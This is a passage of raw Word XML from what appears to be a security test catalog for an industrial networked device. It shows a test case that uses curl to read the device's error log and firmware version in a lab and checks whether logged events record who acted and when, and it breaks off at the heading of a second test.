          <w:p w14:paraId="38A9EEF0" w14:textId="6159CF06" w:rsidR="00B73A1A" w:rsidRPr="0016260A"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6260A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP FSTM / ISTG-PHY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A403484" w14:textId="56F164B3" w:rsidR="00B73A1A" w:rsidRPr="0016260A" w:rsidRDefault="007540B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6260A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="127C376C" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4266E820" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00E3EED1" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="00DB074F" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="12"/>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
      <w:commentRangeEnd w:id="12"/>
      <w:r w:rsidR="00D32AE1" w:rsidRPr="00DB074F">
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:commentReference w:id="12"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCC286" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0D5D9F" w14:textId="3ABD111B" w:rsidR="00E12124" w:rsidRPr="00DC3DB6" w:rsidRDefault="00E12124" w:rsidP="00E12124">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ008-01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Software-Event Evidence Baseline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712DA552" w14:textId="77777777" w:rsidR="007540B2" w:rsidRDefault="007540B2" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC1F40D"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295D9EA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BC4015" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DF349A8"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0F73A5A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9D3B60" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35FB9443" w14:textId="4EFA5A90" w:rsidR="00B73A1A" w:rsidRPr="008768EF" w:rsidRDefault="00776AE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76AED">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ008-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="549ACD9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2A602C7"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15C57EB6" w14:textId="4BB39813" w:rsidR="00B73A1A" w:rsidRPr="006868A2" w:rsidRDefault="0063592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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ-008 (EHSR 1.1.9 §2, software) → CR 2.8 / CR 6.1 → Asset I, Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00D67CA6" w14:paraId="55E84F7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1CE83B5" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A9F8CC5" w14:textId="1AD5137B" w:rsidR="00B73A1A" w:rsidRPr="008768EF" w:rsidRDefault="0063592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Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w14:paraId="2B0204D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C3E33DE" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0958B41A" w14:textId="55046AEA" w:rsidR="00B73A1A" w:rsidRPr="008768EF" w:rsidRDefault="0063592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SVV-1 (Requirements-based Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="1EECC1B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816DB4" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B5A3696" w14:textId="70B48E84" w:rsidR="00B73A1A" w:rsidRPr="008768EF" w:rsidRDefault="002A6399" w:rsidP="002A6399">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6399">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Establish which software-intervention evidence the device produces and whether it is readable: the COM Error Log, /firmware/version, and I&amp;M0 SOFTWARE_REVISION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="002A6399">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> and inspect each for actor identity and absolute timestamp.(Config markers REVISION_COUNTER/I&amp;M4 are out of scope → RQ-009.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="69B80BA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BCFEC7B" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BAC69CB" w14:textId="77777777" w:rsidR="009F1AA4" w:rsidRDefault="009F1AA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F1AA4">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Read the error log and firmware/SOFTWARE_REVISION records at a known-good baseline. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03BA2E9D" w14:textId="77777777" w:rsidR="009F1AA4" w:rsidRDefault="009F1AA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F1AA4">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2. Trigger a benign self-detected software event (e.g., brief SysCom interruption).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72955061" w14:textId="77777777" w:rsidR="009F1AA4" w:rsidRDefault="009F1AA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F1AA4">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Re-read; confirm an Error-Log entry appears. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B01F92" w14:textId="09C20061" w:rsidR="00B73A1A" w:rsidRPr="008768EF" w:rsidRDefault="009F1AA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F1AA4">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Inspect the entry for identity and absolute timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="3EB0083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A45AB0" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="517F9987" w14:textId="77777777" w:rsidR="00B53C40" w:rsidRDefault="00B53C40"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B53C40">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS if the log and software records are readable and the induced event is captured (CR 6.1 + partial CR 2.8). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4037FB49" w14:textId="2731B520" w:rsidR="00B73A1A" w:rsidRPr="008768EF" w:rsidRDefault="00B53C40"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B53C40">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Documented shortfall if no entry carries actor identity or absolute timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0237367E" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="00AF57B2" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B322876"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7C7796F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E47028B" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="353990DF"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74D9F94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2E6BD40" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38F6F321" w14:textId="25E099E9" w:rsidR="00B73A1A" w:rsidRPr="008768EF" w:rsidRDefault="004E73A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E73A4">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ008-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00F15AEA" w14:paraId="0D3D4479"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93CECC9" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6154CCAF" w14:textId="57FF7539" w:rsidR="00B73A1A" w:rsidRPr="008768EF" w:rsidRDefault="00815C1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15C14">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DUT 192.168.0.2; Pi mgmt eth1 = 192.168.50.10; browser 192.168.50.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="108C01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7882D8" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64404460" w14:textId="290ACB37" w:rsidR="00B73A1A" w:rsidRPr="008768EF" w:rsidRDefault="00E6595E"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6595E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl / IoT-Core visualizer; PN acyclic read for I&amp;M0 SOFTWARE_REVISION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="1F9CB16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62827ED" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="261511AB" w14:textId="77777777" w:rsidR="00825938" w:rsidRPr="00825938" w:rsidRDefault="00825938"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25938">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># TC-RQ008-01 Software-event evidence baseline (config markers EXCLUDED -&gt; RQ-009)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1153A71D" w14:textId="77777777" w:rsidR="00825938" w:rsidRPr="006868A2" w:rsidRDefault="00825938"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC0801_log_base.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="513EBCC8" w14:textId="77777777" w:rsidR="00825938" w:rsidRPr="006868A2" w:rsidRDefault="00825938"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/firmware/version -o TC0801_fwver_base.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EDD15CD" w14:textId="77777777" w:rsidR="00825938" w:rsidRPr="00825938" w:rsidRDefault="00825938"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25938">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># I&amp;M0 SOFTWARE_REVISION via acyclic PN read (NOT REVISION_COUNTER / NOT I&amp;M4 -&gt; RQ-009)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="329A4ED0" w14:textId="77777777" w:rsidR="00825938" w:rsidRPr="00825938" w:rsidRDefault="00825938"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25938">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># --- induce a benign self-detected software event (e.g., brief SCPU/SysCom interruption) ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64CE466B" w14:textId="77777777" w:rsidR="00825938" w:rsidRPr="006868A2" w:rsidRDefault="00825938"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC0801_log_after.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D909B25" w14:textId="5870744D" w:rsidR="00B73A1A" w:rsidRPr="006868A2" w:rsidRDefault="00825938"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>diff TC0801_log_base.json TC0801_log_after.json | tee TC0801_logdiff.txt # expect: new ErrorEvent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="58EE9D6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EC7D74" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4795CD37" w14:textId="6D10C4DF" w:rsidR="00B73A1A" w:rsidRPr="008768EF" w:rsidRDefault="00825938"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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Log readble (CR 6.1 met)/ Event captured/ No identity/ timestamp present</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="5324C1C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519843C" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EF2C963" w14:textId="081E3510" w:rsidR="00B73A1A" w:rsidRPr="008768EF" w:rsidRDefault="006135F0" w:rsidP="006135F0">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="6200"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006135F0">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC0801_*.json, TC0801_logdiff.txt, IoT-Core screenshots</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="568ECF38" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329A1065" w14:textId="15610487" w:rsidR="000409F3" w:rsidRDefault="00171DD3" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ008-02 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Self-Erasing Firmware Install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02160AA1" w14:textId="77777777" w:rsidR="000409F3" w:rsidRDefault="000409F3" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1384E0FE" w14:textId="77777777" w:rsidR="006135F0" w:rsidRPr="006868A2" w:rsidRDefault="006135F0" w:rsidP="006135F0">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006868A2">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135F0" w14:paraId="1489463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B83069" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14261892" w14:textId="77777777" w:rsidR="006135F0"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135F0" w14:paraId="2C64893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7C07C" w14:textId="77777777" w:rsidR="006135F0" w:rsidRDefault="006135F0" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E8055B3" w14:textId="300E6BC4" w:rsidR="006135F0" w:rsidRPr="006135F0" w:rsidRDefault="009B6CA4" w:rsidP="009B6CA4">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1940"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B6CA4">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ008-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
